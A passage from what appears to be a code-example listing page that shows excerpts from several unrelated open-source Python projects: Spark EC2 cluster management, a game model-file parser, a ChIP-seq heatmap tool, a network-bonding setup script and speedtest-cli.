    if opts.master_instance_type != "":
        if opts.master_instance_type not in EC2_INSTANCE_TYPES:
            print("Warning: Unrecognized EC2 instance type for master-instance-type: {t}".format(
                  t=opts.master_instance_type), file=stderr)
        # Since we try instance types even if we can't resolve them, we check if they resolve first
        # and, if they do, see if they resolve to the same virtualization type.
        if opts.instance_type in EC2_INSTANCE_TYPES and \
           opts.master_instance_type in EC2_INSTANCE_TYPES:
            if EC2_INSTANCE_TYPES[opts.instance_type] != \
               EC2_INSTANCE_TYPES[opts.master_instance_type]:
                print("Error: this script currently does not support having a master and slaves "
                      "with different AMI virtualization types.", file=stderr)
                print("master instance virtualization type: {t}".format(
                      t=EC2_INSTANCE_TYPES[opts.master_instance_type]), file=stderr)
                print("slave instance virtualization type: {t}".format(
                      t=EC2_INSTANCE_TYPES[opts.instance_type]), file=stderr)
                sys.exit(1)

    try:
        if opts.profile is None:
            conn = ec2.connect_to_region(opts.region)
        else:
            conn = ec2.connect_to_region(opts.region, profile_name=opts.profile)
    except Exception as e:
        print((e), file=stderr)
        sys.exit(1)

    # Select an AZ at random if it was not specified.
    if opts.zone == "":
        opts.zone = random.choice(conn.get_all_zones()).name

    if action == "launch":
        if opts.slaves <= 0:
            print("ERROR: You have to start at least 1 slave", file=sys.stderr)
            sys.exit(1)
        if opts.resume:
            (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        else:
            (master_nodes, slave_nodes) = launch_cluster(conn, opts, cluster_name)
        wait_for_cluster_state(
            conn=conn,
            opts=opts,
            cluster_instances=(master_nodes + slave_nodes),
            cluster_state='ssh-ready'
        )
        setup_cluster(conn, master_nodes, slave_nodes, opts, True)

        # Write the public and private ip addresses to a file.
        write_public_and_private_ip_addresses_to_file(master_nodes, slave_nodes)

    elif action == "destroy":
        (master_nodes, slave_nodes) = get_existing_cluster(
            conn, opts, cluster_name, die_on_error=False)

        if any(master_nodes + slave_nodes):
            print("The following instances will be terminated:")
            for inst in master_nodes + slave_nodes:
                print("> %s" % get_dns_name(inst, opts.private_ips))
            print("ALL DATA ON ALL NODES WILL BE LOST!!")

        msg = "Are you sure you want to destroy the cluster {c}? (y/N) ".format(c=cluster_name)
        response = raw_input(msg)
        if response == "y":
            print("Terminating master...")
            for inst in master_nodes:
                inst.terminate()
            print("Terminating slaves...")
            for inst in slave_nodes:
                inst.terminate()

            # Delete security groups as well
            if opts.delete_groups:
                group_names = [cluster_name + "-master", cluster_name + "-slaves"]
                wait_for_cluster_state(
                    conn=conn,
                    opts=opts,
                    cluster_instances=(master_nodes + slave_nodes),
                    cluster_state='terminated'
                )
                print("Deleting security groups (this will take some time)...")
                attempt = 1
                while attempt <= 3:
                    print("Attempt %d" % attempt)
                    groups = [g for g in conn.get_all_security_groups() if g.name in group_names]
                    success = True
                    # Delete individual rules in all groups before deleting groups to
                    # remove dependencies between them
                    for group in groups:
                        print("Deleting rules in security group " + group.name)
                        for rule in group.rules:
                            for grant in rule.grants:
                                success &= group.revoke(ip_protocol=rule.ip_protocol,
                                                        from_port=rule.from_port,
                                                        to_port=rule.to_port,
                                                        src_group=grant)

                    # Sleep for AWS eventual-consistency to catch up, and for instances
                    # to terminate
                    time.sleep(30)  # Yes, it does have to be this long :-(
                    for group in groups:
                        try:
                            # It is needed to use group_id to make it work with VPC
                            conn.delete_security_group(group_id=group.id)
                            print("Deleted security group %s" % group.name)
                        except boto.exception.EC2ResponseError:
                            success = False
                            print("Failed to delete security group %s" % group.name)

                    # Unfortunately, group.revoke() returns True even if a rule was not
                    # deleted, so this needs to be rerun if something fails
                    if success:
                        break

                    attempt += 1

                if not success:
                    print("Failed to delete all security groups after 3 tries.")
                    print("Try re-running in a few minutes.")

    elif action == "reboot-slaves":
        response = raw_input(
            "Are you sure you want to reboot the cluster " +
            cluster_name + " slaves?\n" +
            "Reboot cluster slaves " + cluster_name + " (y/N): ")
        if response == "y":
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            print("Rebooting slaves...")
            for inst in slave_nodes:
                if inst.state not in ["shutting-down", "terminated"]:
                    print("Rebooting " + inst.id)
                    inst.reboot()

    elif action == "get-master":
        (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        if not master_nodes[0].public_dns_name and not opts.private_ips:
            print("Master has no public DNS name.  Maybe you meant to specify --private-ips?")
        else:
            print(get_dns_name(master_nodes[0], opts.private_ips))

    elif action == "stop":
        response = raw_input(
            "Are you sure you want to stop the cluster " +
            cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
            "BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
            "AMAZON EBS IF IT IS EBS-BACKED!!\n" +
            "All data on spot-instance slaves will be lost.\n" +
            "Stop cluster " + cluster_name + " (y/N): ")
        if response == "y":
            (master_nodes, slave_nodes) = get_existing_cluster(
                conn, opts, cluster_name, die_on_error=False)
            print("Stopping master...")
            for inst in master_nodes:
                if inst.state not in ["shutting-down", "terminated"]:
                    inst.stop()
            print("Stopping slaves...")
            for inst in slave_nodes:
                if inst.state not in ["shutting-down", "terminated"]:
                    if inst.spot_instance_request_id:
                        inst.terminate()
                    else:
                        inst.stop()

    elif action == "start":
        (master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
        print("Starting slaves...")
        for inst in slave_nodes:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        print("Starting master...")
        for inst in master_nodes:
            if inst.state not in ["shutting-down", "terminated"]:
                inst.start()
        wait_for_cluster_state(
            conn=conn,
            opts=opts,
            cluster_instances=(master_nodes + slave_nodes),
            cluster_state='ssh-ready'
        )

        # Determine types of running instances
        existing_master_type = master_nodes[0].instance_type
        existing_slave_type = slave_nodes[0].instance_type
        # Setting opts.master_instance_type to the empty string indicates we
        # have the same instance type for the master and the slaves
        if existing_master_type == existing_slave_type:
            existing_master_type = ""
        opts.master_instance_type = existing_master_type
        opts.instance_type = existing_slave_type

        setup_cluster(conn, master_nodes, slave_nodes, opts, False)

        # Write the public and private ip addresses to a file.
        write_public_and_private_ip_addresses_to_file(master_nodes, slave_nodes)

    else:
        print("Invalid action: %s" % action, file=stderr)
        sys.exit(1)

Example 8

Project: GameTools
Source File: unmdr.py
View license
def dump_model(base_name, num_models, f, model_number, outdir, dump = True, verbose=False):
    print("# Start model", "0x%x" % f.tell(), "##############################################################")
    name_length, = struct.unpack("<H", f.read(2))
    print("# submodel name length:", name_length)
    submodel_name = f.read(name_length).decode("ascii")
    print("# submodel name:", submodel_name)

    # output files
    obj_fout = None
    mtl_fout = None
    
    # object
    mdr_obj = None

    # logging to ease reversing
    logger = open("logger.txt", 'ab')
    
    if dump:
        obj_fout = open(os.path.join(outdir, "%s_%s.obj" % (base_name, submodel_name)), 'wb')
        mtl_fout = open(os.path.join(outdir, "%s_%s.mtl" % (base_name, submodel_name)), 'wb')
        mdr_obj = MDR_Object("%s_%s" % (base_name, submodel_name))

    unk, = struct.unpack("b", f.read(1))
    print("# Read unknown byte (always 2?):", unk)
    if unk != 2:
        error_message = "Unknown is not 2"
        #raise ValueError(error_message)
        print(error_message)
    print("# Start unknown section", "0x%x" % f.tell())    
    for i in range(0, int(0xB0/4)):
        unk, = struct.unpack("f", f.read(4))
        if verbose:
            print("# [%i] %f" % (i, unk))
    print("# Finished unknown section", "0x%x" % f.tell())


    ###############################################
    print("# Start face vertex indices")
    face_count, = struct.unpack("<I", f.read(4))
    print("# Face count:", face_count/3)
    manifest = {u'model': base_name, u'sub_model': submodel_name, u'vertex_index_offset' : f.tell()}
    
    for i in range(0, int(face_count/3)):
        if not dump:
            f.read(6)
        else:
            v0, v1, v2 = struct.unpack("<HHH", f.read(6))
            #print("f %i/%i %i/%i %i/%i" % (v0+1,v0+1,v1+1,v1+1,v2+1,v2+1))
            mdr_obj.index_array.append((v0,v1,v2))
    print("# Finished face vertex indices", "0x%x" % f.tell())
    ###############################################

    ###############################################
    print("# Start UVs")
    uv_in_section, = struct.unpack("<I", f.read(4))
    print("# UV in section:", uv_in_section/2)

    manifest[u'vertex_uv_offset'] = f.tell()
    
    for i in range(0, int(uv_in_section/2)):
        if not dump:
            f.read(8)
        else:
            u,v = struct.unpack("<ff", f.read(8))        
            #print("vt", u,v)
            mdr_obj.uv_array.append((u,v))                    
    print("# Finish UV section:", "0x%x" % f.tell())
    ###############################################

    print("# Start unknown section 1")
    unk, = struct.unpack("<I", f.read(4))
    print("# Unknown", "0x%x" % unk)

    if model_number == 0:
        print("# Some matrix?")
        for i in range(0, int(0x30/4)):
            unk1,unk2 = struct.unpack("ff", f.read(8))
            if verbose:
                print("# [%i] %f, %f" % (i, unk1, unk2))
        
        print("# End unknown section", "0x%x" % f.tell())
        unk, = struct.unpack("<I", f.read(4))
        print("# Read 4 bytes (always 0?)", unk)
        if unk != 0:
            error_message = "Unknown is not 0"
            #raise ValueError(error_message)
            print(error_message)

        object_count, = struct.unpack("<I", f.read(4))
        print("# Read 4 bytes, object type?: ", object_count)

        for i in range(0, object_count):
            name_length, = struct.unpack("<H", f.read(2))
            print(i, f.read(name_length))
            read_matrix(f)
        manifest[u'material'] = []
        length, = struct.unpack("<H", f.read(2))
        meta0_offset = f.tell()
        print("# random garbage? ", "0x%x" % f.tell())
        unk = f.read(48)
        length, = struct.unpack("<H", f.read(2))
        meta1_offset = f.tell()
        meta1 = read_material(f)
        if dump:
            mdr_obj.material = meta1
        manifest[u'material'].append( ( {u'offset': meta1_offset}, meta1) )
        print("# Unknown float", struct.unpack("f", f.read(4)))
        print("# end object type 0", "0x%x" % f.tell())
        # f.read(0x68)
        print("# End unknown", "0x%x" % f.tell())
    else:
        length, = struct.unpack("<xxH", f.read(4))
        unknown_meta = f.read(length).decode("ascii")
        print("# unknown meta2:", unknown_meta)
        valid_weapon_meta_list = ["weapon", "tripod", "base", "clip", "mortar", "missile", "grenade", "day sight",
                                  "m1a2", "m203", "m320", "day", "cylinder01", "ammo", "bogus-weapon", "periscope_circle",
                                  "mgbracket", "crows_structure", "launcher support"]
        valid_building_meta_list = ["junkdebris", "level", "roof", "wall"]
        valid_vehicle_meta_list = ["backbasket", "canvas", "gear", "hull", "hatch", "loadershield", "mount", "muzzle",
                                   "turret", "suporte", "rc_mg_sensors", "wheel"]
        valid_meta_list = valid_weapon_meta_list + valid_building_meta_list + valid_vehicle_meta_list
        
        # if True in map(lambda x: unknown_meta.startswith(x), valid_meta_list):
        print("# Reading", unknown_meta)
        f.read(0x60)
        normal_count, = struct.unpack("<I", f.read(4))
        print("# Count", normal_count)
        if normal_count == 0:
            f.read(0x68)
        else:
            for i in range(0, normal_count):
                length, = struct.unpack("<H", f.read(2))
                unknown_meta2 = f.read(length).decode("ascii")
                print("Sub-meta:", unknown_meta2)
                valid_sub_meta = ["commander", "eject", "exhaust", "gunner", "leader", "loader", "link", "muzzle",
                                  "firespot", "smoke", "weapon"]
                print(map(lambda x: unknown_meta2.startswith(x), valid_sub_meta))
                if True in map(lambda x: unknown_meta2.startswith(x), valid_sub_meta):
                    read_matrix(f)
                    print("#End of sub-meta", "0x%x" % f.tell())
                elif length == 0:
                    print("#End of sub-meta", "0x%x" % f.tell())
                else:
                    read_matrix(f)
                    print("#Possible error0 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta2))
                    print("#End of sub-meta", "0x%x" % f.tell())
                    sys.exit(0)
            #special_meta_list = ["weapon", "base", "tripod", "launcher support", "mount", "hull", "turret", "suporte"]
            #if True in map(lambda x: unknown_meta.startswith(x), special_meta_list):
            f.read(0x68)
            # else:
            # print("# Possible error1 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta))
            # sys.exit(0)
        # else:
        #     print("#Possible error2 in %s! (%s) Report about it on the forum." % (f.name, unknown_meta))
        #     sys.exit(0)
        print("# Unknown meta finished", "0x%x" % f.tell())

    unk, = struct.unpack("<I", f.read(4))
    print("# Read 4 bytes (always 0?)", unk)
    if unk != 0:
        error_message = "Unknown is not 0"
        #raise ValueError(error_message)
        print(error_message)

    name_length, = struct.unpack("<H", f.read(2))
    texture_name = f.read(name_length).decode("ascii")
    print("# Texture name:", texture_name)
    if dump:
        mdr_obj.texture_name = texture_name

    unk, = struct.unpack("b", f.read(1))
    print("# Read unknown byte (always 2?):", unk)
    if unk != 2:
        error_message = "Unknown is not 2"
        #raise ValueError(error_message)
        print(error_message)

    print("# Start unknown section of 176 bytes", "0x%x" % f.tell())
    for i in range(0, int(0xB0/4)):
        unk, = struct.unpack("f", f.read(4))
        if verbose:
            print("# [%i] %i" % (i, unk))
    print("# Finished unknown section", "0x%x" % f.tell())

    ###############################################
    print("# Start vertices")
    vertex_floats, = struct.unpack("<I", f.read(4))
    print("# Vertex count:", vertex_floats/3)
    manifest[u'vertex_offset'] = f.tell()
    
    for i in range(0, int(vertex_floats/3)):
        if not dump:
            f.read(12)
        else:
            x, y, z = struct.unpack("fff", f.read(12))
            mdr_obj.vertex_array.append((x, y, z))
    print("# End vertices", "0x%x" % f.tell())
    ###############################################
    
    print("# Start vertex normals")
    normal_count, = struct.unpack("<I", f.read(4))
    print("# Normals count:", normal_count/3) # 3 per vertex
    manifest[u'vertex_normals_offset'] = f.tell()

    for i in range(0, int(normal_count/3)):
        if not dump:
            f.read(6)
        else:
            nx, ny, nz = struct.unpack("<HHH", f.read(6))
            if verbose:
                print("# [%i] %i %i %i" % (i, nx, ny, nz))
            mdr_obj.vertex_normal_array.append((nx, ny, nz))
    print("# End normals", "0x%x" % f.tell())
    ###############################################

    unk, = struct.unpack("<I", f.read(4))
    print("# Parsing footer, count:", unk)
    if unk != 0:
        print(f.name)
        for i in range(0, unk):
            print(struct.unpack("<fff", f.read(12)))
            length, = struct.unpack("<I", f.read(4))
            f.read(length * 4)
    print("# End model ##############################################################")
    f.read(1)

    if dump:
        obj_fout.write(mdr_obj.make_wavefront_obj().encode("ascii"))
        mtl_fout.write(mdr_obj.make_wavefront_mtl().encode("ascii"))
        obj_fout.close()
        mtl_fout.close()
    logger.close()
    return manifest

Example 9

Project: fluff
Source File: heatmap.py
View license
def heatmap(args):
    datafiles = args.datafiles
    for x in args.datafiles:
        if not os.path.isfile(x):
            print "ERROR: Data file '{0}' does not exist".format(x)
            sys.exit(1)
    for x in args.datafiles:
        if '.bam' in x and not os.path.isfile("{0}.bai".format(x)):
            print "Data file '{0}' does not have an index file. Creating an index file for {0}.".format(x)
            pysam.index(x)

    # Options Parser
    featurefile = args.featurefile
    datafiles = [x.strip() for x in args.datafiles]
    tracks = [os.path.basename(x) for x in datafiles]
    titles = [os.path.splitext(x)[0] for x in tracks]
    colors = parse_colors(args.colors)
    bgcolors = parse_colors(args.bgcolors)
    outfile = args.outfile
    extend_up = args.extend
    extend_down = args.extend
    fragmentsize = args.fragmentsize
    cluster_type = args.clustering[0].lower()
    merge_mirrored = args.merge_mirrored
    bins = (extend_up + extend_down) / args.binsize
    rmdup = args.rmdup
    rpkm = args.rpkm
    rmrepeats = args.rmrepeats
    ncpus = args.cpus
    distancefunction = args.distancefunction[0].lower()
    dynam = args.graphdynamics
    fontsize = args.textfontsize

    # Check for mutually exclusive parameters
    if dynam:
        if merge_mirrored:
            print "ERROR: -m and -g option CANNOT be used together"
            sys.exit(1)
        if distancefunction == 'e':
            print 'Dynamics can only be identified using Pearson correlation as metric.'
            print 'Assigning metric to Pearson correlation'
            distancefunction = 'p'

    # Warning about too much files
    if (len(tracks) > 4):
        print "Warning: Running fluff with too many files might make you system use enormous amount of memory!"
    
    # Method of clustering
    if (args.pick != None):
        pick = [i - 1 for i in split_ranges(args.pick)]
        if not all(i <= len(tracks) - 1 for i in pick):
            sys.stderr.write("You picked a non-existent file for clustering.\n")
            sys.exit(1)
    else:
        pick = range(len(datafiles))


    if not cluster_type in ["k", "h", "n"]:
        sys.stderr.write("Unknown clustering type!\n")
        sys.exit(1)
    # Number of clusters
    if cluster_type == "k" and not args.numclusters >= 2:
        sys.stderr.write("Please provide number of clusters!\n")
        sys.exit(1)
    # Distance function
    if not distancefunction in ["e", "p"]:
        sys.stderr.write("Unknown distance function!\n")
        sys.exit(1)
    else:
        if distancefunction == "e":
            METRIC = cfg.DEFAULT_METRIC
            print "Euclidean distance method"
        else:
            METRIC = "c"
            print "Pearson distance method"
    ## Get scale for each track
    tscale = [1.0 for track in datafiles]

    # Function to load heatmap data
    def load_data(featurefile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm, rmrepeats, fragmentsize, dynam,
                  guard=None):
        if guard is None:
            guard = []
        # Calculate the profile data
        data = {}
        regions = []
        print "Loading data"
        try:
            # Load data in parallel
            pool = multiprocessing.Pool(processes=ncpus)
            jobs = []
            for datafile in datafiles:
                jobs.append(pool.apply_async(load_heatmap_data, args=(
                featurefile, datafile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm, rmrepeats,
                fragmentsize, dynam, guard)))
            for job in jobs:
                track, regions, profile, guard = job.get()
                data[track] = profile
        except Exception as e:
            sys.stderr.write("Error loading data in parallel, trying serial\n")
            sys.stderr.write("Error: {}\n".format(e))
            for datafile in datafiles:
                track, regions, profile, guard = load_heatmap_data(featurefile, datafile, amount_bins, extend_dyn_up,
                                                                   extend_dyn_down, rmdup, rpkm, rmrepeats,
                                                                   fragmentsize, dynam, guard)
                data[track] = profile
        return data, regions, guard

    # -g : Option to try and get dynamics
    # Extend features 1kb up/down stream
    # Cluster them in one bin
    # Cluster them in one bin
    guard = []
    amount_bins = bins
    extend_dyn_up = extend_up
    extend_dyn_down = extend_down
    if dynam:
        # load the data once to get the features which extend below 0
        guard = check_data(featurefile, extend_dyn_up, extend_dyn_down)
        extend_dyn_up = 1000
        extend_dyn_down = 1000
        amount_bins = 1

    # Load data for clustering
    data, regions, guard = load_data(featurefile, amount_bins, extend_dyn_up, extend_dyn_down, rmdup, rpkm,
                                         rmrepeats,
                                         fragmentsize, dynam, guard)
    
    # Normalize
    norm_data = normalize_data(data, cfg.DEFAULT_PERCENTILE)

    clus = hstack([norm_data[t] for i, t in enumerate(tracks) if (not pick or i in pick)])

    # Clustering
    if cluster_type == "k":
        print "K-means clustering"
        ## K-means clustering
        # PyCluster
        labels, _, nfound = Pycluster.kcluster(clus, args.numclusters, dist=METRIC)
        if not dynam and merge_mirrored:
            (i, j) = mirror_clusters(data, labels)
            while j:
                for track in data.keys():
                    data[track][labels == j] = [row[::-1] for row in data[track][labels == j]]
                for k in range(len(regions)):
                    if labels[k] == j:
                        (chrom, start, end, gene, strand) = regions[k]
                        if strand == "+":
                            strand = "-"
                        else:
                            strand = "+"
                        regions[k] = (chrom, start, end, gene, strand)
                n = len(set(labels))
                labels[labels == j] = i
                for k in range(j + 1, n):
                    labels[labels == k] = k - 1
                (i, j) = mirror_clusters(data, labels)

        ind = labels.argsort()

        # Hierarchical clustering
    elif cluster_type == "h":
        print "Hierarchical clustering"
        tree = Pycluster.treecluster(clus, method="m", dist=METRIC)
        labels = tree.cut(args.numclusters)
        ind = sort_tree(tree, arange(len(regions)))
    else:
        ind = arange(len(regions))
        labels = zeros(len(regions))

    # Load data for visualization if -g option was used
    if dynam:
        data, regions, guard = load_data(featurefile, bins, extend_up, extend_down, rmdup, rpkm, rmrepeats,
                                         fragmentsize, dynam, guard)

    f = open("{0}_clusters.bed".format(outfile), "w")
    for (chrom, start, end, gene, strand), cluster in zip(array(regions, dtype="object")[ind], array(labels)[ind]):
        if not gene:
            f.write("{0}\t{1}\t{2}\t.\t{3}\t{4}\n".format(chrom, start, end, cluster + 1, strand))
        else:
            f.write("{0}\t{1}\t{2}\t{3}\t{4}\t{5}\n".format(chrom, start, end, gene, cluster + 1, strand))
    f.close()
    # Save read counts
    readcounts = {}
    for i, track in enumerate(tracks):
        readcounts[track] = {}
        readcounts[track]['bins'] = []
        for idx, row in enumerate(data[track]):
            bins = ''
            for b in row:
                if not bins:
                    bins = '{0}'.format(b)
                else:
                    bins = '{0};{1}'.format(bins, b)
            readcounts[track]['bins'].append(bins)
    
    input_fileBins = open('{0}_readCounts.txt'.format(outfile), 'w')
    input_fileBins.write('Regions\t')
    for i, track in enumerate(titles):
        input_fileBins.write('{0}\t'.format(track))
    input_fileBins.write('\n')
    for i, track in enumerate(tracks):
        for idx in ind:
            input_fileBins.write('{0}:{1}-{2}\t'.format(regions[idx][0], regions[idx][1], regions[idx][2]))
            for i, track in enumerate(tracks):
                input_fileBins.write('{0}\t'.format(readcounts[track]['bins'][idx]))
            input_fileBins.write('\n')
        break
    input_fileBins.close()
 
    if not cluster_type == "k":
        labels = None

    scale = get_absolute_scale(args.scale, [data[track] for track in tracks])
    heatmap_plot(data, ind[::-1], outfile, tracks, titles, colors, bgcolors, scale, tscale, labels, fontsize)

Example 10

Project: bonding
Source File: bonding.py
View license
def collect_bond_info(groups, distro):
    ifaces = get_iface_list()
    bonds = {}
    all_slaves = {}
    for iface in ifaces:
        if is_iface_master(iface) and get_slave_iface_list(iface):
            slaves = get_slave_iface_list(iface)
            if slaves:
                bonds[iface] = slaves
                for slave in list(slaves):
                    all_slaves[slave] = iface
            else:
                bonds[iface] = []

    bond_range = range(0, 101)
    if bonds:
        print ('%s\nThe following bonded interfaces are already '
               'configured:\n' % YELLOW)
        for bondIface in bonds:
            print '%s' % bondIface
            bond_int = int(bondIface.replace('bond', ''))
            del bond_range[bond_range.index(bond_int)]
            for slave in bonds[bondIface]:
                print '\t%s' % slave
    else:
        print ('\n%sThere are no bonded interfaces currently present in the '
               'running\nconfiguration on this server. This does not take '
               'into account configuration\nthat have not yet been loaded '
               'into the running configuration.''' % GREEN)

    print '%s' % RESET

    children = None
    if groups:
        selections = {}
        print 'Interface groups available for configuration:\n'
        i = 1
        for key in reversed(groups.keys()):
            group = [key] + groups[key]
            print '%s%s) %s%s' % (PINK, i, ' '.join(sorted(group)), RESET)
            selections[str(i)] = group
            i += 1

        try:
            response = raw_input('\nWhich numerical interface group from '
                                 'above would you like to configure? '
                                 '(leave blank or hit enter to perform '
                                 'manual entry later) ').strip()
            if not response:
                children = None
            elif response not in selections:
                print '%sInvalid selection. Can not continue.%s' % (RED, RESET)
                sys.exit(1)
            else:
                children = selections[response]
        except KeyboardInterrupt:
            sys.exit(0)

    bond = defaults('What is the name of the bond interface you are '
                    'configuring?', 'bond%s' % bond_range[0])
    if bond in ifaces and is_iface_master(bond) and get_slave_iface_list(bond):
        del bond_range[bond_range.index(int(bond.replace('bond', '')))]
        bond = defaults('%s%s is already configured as a master interface.%s\n'
                        'What is the name of the bond interface you are '
                        'configuring?' % (RED, bond, RESET),
                        'bond%s' % bond_range[0])
        if (bond in ifaces and is_iface_master(bond) and
                get_slave_iface_list(bond)):
            print ('%sA valid bond interface was not provided. Can not '
                   'continue%s' % (RED, RESET))
            sys.exit(1)

    print ('%sThe bonded interface will be named: %s%s%s\n' %
           (GREEN, YELLOW, bond, RESET))

    mode_map = {
        '0': 'balance-rr',
        '1': 'active-backup',
        '2': 'balance-xor',
        '3': 'broadcast',
        '4': '802.3ad',
        '5': 'balance-tlb',
        '6': 'balance-alb',
    }

    modes = list(mode_map.keys()) + list(mode_map.values())

    mode = defaults('Which bonding mode do you want to use for %s?' % bond,
                    'active-backup')
    if mode not in modes:
        mode = defaults('%sThe bonding mode may be one of %s.%s\nWhat '
                        'bonding mode do you want to use for %s?' %
                        (RED, ', '.join(modes), RESET, bond), 'active-backup')
        if mode not in modes:
            print ('%sA valid bonding mode was not provided. Can not '
                   'continue%s' % (RED, RESET))
            sys.exit(1)

    extra_opts = ''
    if mode == '4' or mode == '802.3ad':
        if distro == 'redhat':
            extra_opts = ' lacp_rate=1'
        elif distro == 'debian':
            extra_opts = '    bond-lacp-rate 1'

    if mode in mode_map:
        mode = mode_map[mode]

    print ('%sThe bonded interface will use mode %s%s%s\n' %
           (GREEN, YELLOW, mode, RESET))

    if not children:
        children = defaults('What are the interfaces that will be part of the '
                            'bond?', 'eth0 eth1')
        if children:
            children = children.split()
        else:
            print ('%sYou did not provide any interfaces to be part of %s%s' %
                   (RED, bond, RESET))
            sys.exit(1)

    bail = False
    ip_addresses = {}
    for child in children:
        if child not in ifaces:
            print ('%sYou provided an interface name that does not exist on '
                   'this system: %s%s' % (RED, child, RESET))
            bail = True
        elif is_iface_slave(child):
            print ('%sYou provided an interface name that is already part of '
                   'an already configured bond (%s): %s%s' %
                   (RED, all_slaves[child], child, RESET))
            bail = True

        ip_address = get_ip_address(child)
        if ip_address:
            ip_addresses[ip_address] = child

    if bail:
        sys.exit(1)

    print '%sThe interfaces that will be used for %s%s%s will be: %s%s%s\n' % (
        GREEN, YELLOW, bond, GREEN, YELLOW, ' '.join(children), RESET)

    if len(ip_addresses) > 1:
        print '%sThe following IP addresses were found:' % YELLOW
        for addr in ip_addresses:
            print '%s: %s' % (ip_addresses[addr], addr)
        ip_address = defaults('\n%sWhich of the above IP addresses do you '
                              'want to use for the primary IP for %s?' %
                              (RESET, bond), ip_addresses.keys()[0])
    else:
        ip_address = ip_addresses.keys()
        if ip_address:
            ip_address = ip_address[0]
        else:
            ip_address = ''
        ip_address = defaults('What IP address do you want to use for the '
                              'primary IP for %s?' % bond, ip_address)

    try:
        socket.inet_aton(ip_address)
    except socket.error:
        print '%s"%s" is not a valid IP address.%s' % (RED, ip_address, RESET)
        sys.exit(1)

    print '%sThe IP address that will be used for %s%s%s will be: %s%s%s\n' % (
        GREEN, YELLOW, bond, GREEN, YELLOW, ip_address, RESET)

    netmask = None
    if ip_address in ip_addresses:
        netmask = get_network_mask(ip_addresses[ip_address])
    if not netmask:
        netmask = defaults('No Network Mask was located. What Network Mask do '
                           'you want to use for %s?' % bond, '255.255.255.0')
    else:
        netmask = defaults('What Network Mask do you want to use for %s?' %
                           bond, netmask)

    print ('%sThe Network Mask that will be used for %s%s%s will be: '
           '%s%s%s\n' % (GREEN, YELLOW, bond, GREEN, YELLOW, netmask, RESET))

    gateway_dev = get_default_gateway_dev()
    print ('%sCurrent default gateway details from the running '
           'configuration:' % YELLOW)
    print 'Gateway IP:  %s' % get_default_gateway()
    print 'Gateway Dev: %s' % gateway_dev
    print ('This does not take into account configurations that have not yet '
           'been loaded into the running configuration.')
    print '%s' % RESET

    change_gw_default_response = True
    if gateway_dev.startswith('bond'):
        change_gw_default_response = False
    change_gw = confirm('Change the default gateway and gateway device on '
                        'this system?', change_gw_default_response)
    if change_gw:
        gateway = get_default_gateway()
        if not gateway:
            gateway = defaults('No default gateway was located on this system.'
                               '\nWhat default gateway do you want to use for '
                               'this system? It must be accessible from %s.' %
                               bond,
                               '.'.join(ip_address.split('.')[0:3]) + '.1')
        else:
            gateway = defaults('%s accessible default gateway for this '
                               'system?' % bond, gateway)
        print ('%sThe default gateway that will be used for %s%s%s will be: '
               '%s%s%s\n' %
               (GREEN, YELLOW, bond, GREEN, YELLOW, gateway, RESET))
    else:
        gateway = False
        print ('%sThe default gateway will %sNOT%s be changed for %s%s%s\n' %
               (GREEN, YELLOW, GREEN, YELLOW, bond, RESET))

    return {
        'master': bond,
        'slaves': children,
        'ipaddr': ip_address,
        'netmask': netmask,
        'gateway': gateway,
        'mode': mode,
        'opts': extra_opts
    }

Example 11

Project: speedtest-cli
Source File: speedtest_cli.py
View license
def speedtest():
    """Run the full speedtest.net test"""

    global shutdown_event, source, scheme
    shutdown_event = threading.Event()

    signal.signal(signal.SIGINT, ctrl_c)

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes', dest='units', action='store_const',
                        const=('byte', 1), default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                             'not affect the image generated by --share')
    parser.add_argument('--share', action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                             'share results image')
    parser.add_argument('--simple', action='store_true',
                        help='Suppress verbose output, only show basic '
                             'information')
    parser.add_argument('--list', action='store_true',
                        help='Display a list of speedtest.net servers '
                             'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout', default=10, type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure', action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                             'with speedtest.net operated servers')
    parser.add_argument('--version', action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options

    # Print the version and exit
    if args.version:
        version()

    socket.setdefaulttimeout(args.timeout)

    # Pre-cache the user agent string
    build_user_agent()

    # If specified bind to a specific IP address
    if args.source:
        source = args.source
        socket.socket = bound_socket

    if args.secure:
        scheme = 'https'

    if not args.simple:
        print_('Retrieving speedtest.net configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

    if not args.simple:
        print_('Retrieving speedtest.net server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

    if not args.simple:
        print_('Testing from %(isp)s (%(ip)s)...' % config['client'])

    if args.server:
        try:
            best = getBestServer(filter(lambda x: x['id'] == args.server,
                                        servers))
        except IndexError:
            print_('Invalid server ID')
            sys.exit(1)
    elif args.mini:
